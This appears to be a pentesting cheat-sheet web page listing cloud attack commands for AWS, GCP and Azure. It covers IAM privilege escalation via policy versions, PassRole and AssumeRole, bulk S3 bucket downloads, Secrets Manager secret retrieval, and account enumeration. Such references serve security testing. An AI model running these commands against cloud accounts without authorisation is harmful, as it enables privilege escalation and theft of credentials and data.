Cloud Security Cheat Sheet

Cloud security testing for AWS, GCP, and Azure — credential enumeration, privilege escalation paths, lateral movement, and service-specific attack techniques. (25 payloads)

AWS Credential Enumeration

(5)

aws sts get-caller-identity

Who am I? — shows account ID, user/role ARN

aws iam list-attached-user-policies --user-name <user>

List policies attached to a user

aws iam list-groups-for-user --user-name <user>

List groups the user belongs to

python3 enumerate-iam.py --access-key AKIA... --secret-key ...

Enumerate all IAM permissions by brute-forcing API calls

pacu

AWS exploitation framework — automated privilege escalation and enumeration

AWS Privilege Escalation

(5)

aws iam create-policy-version --policy-arn <arn> --policy-document file://admin.json --set-as-default

iam:CreatePolicyVersion — create new policy version with AdministratorAccess

aws ec2 run-instances --iam-instance-profile Name=AdminRole --image-id ami-xxx --instance-type t2.micro

iam:PassRole + ec2:RunInstances — create EC2 with admin role attached

aws lambda create-function --function-name privesc --role arn:aws:iam::ACCT:role/AdminRole ...

iam:PassRole + lambda:CreateFunction + lambda:InvokeFunction — Lambda privesc

aws sts assume-role --role-arn arn:aws:iam::ACCT:role/HighPrivRole --role-session-name pwn

sts:AssumeRole — assume higher-privileged role

aws glue create-dev-endpoint --endpoint-name pwn --role-arn arn:aws:iam::ACCT:role/AdminRole

glue:CreateDevEndpoint — endpoint receives credentials of passed role

AWS Lateral Movement

(5)

aws s3 ls

List all accessible S3 buckets

aws s3 cp s3://bucket/ . --recursive

Download entire bucket contents

aws ec2 describe-instances --query 'Reservations[].Instances[].[InstanceId,PublicIpAddress,Tags]'

List all EC2 instances with IPs and tags

aws secretsmanager list-secrets

List all secrets in Secrets Manager

aws secretsmanager get-secret-value --secret-id <name>

Retrieve secret value — credentials, API keys, DB passwords

GCP Enumeration

(5)

gcloud auth list

List current authenticated identities

gcloud projects list

List all accessible GCP projects

gcloud iam service-accounts list

List service accounts in current project

gcloud compute instances list

List all VM instances across zones

gcloud storage ls

List all accessible GCS buckets

Azure Enumeration

(5)

az account list

List accessible Azure subscriptions

az vm list -o table

List all virtual machines

az keyvault list

List Key Vaults — may contain secrets, certificates, keys

az storage account list

List all storage accounts

az role assignment list --all

List all RBAC role assignments across subscription

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Generators

Cloud Infrastructure

Related Cheat Sheets

SSRF Cheat Sheet Post-Exploitation Cheat Sheet Cloud Attacks Cheat Sheet

$loading...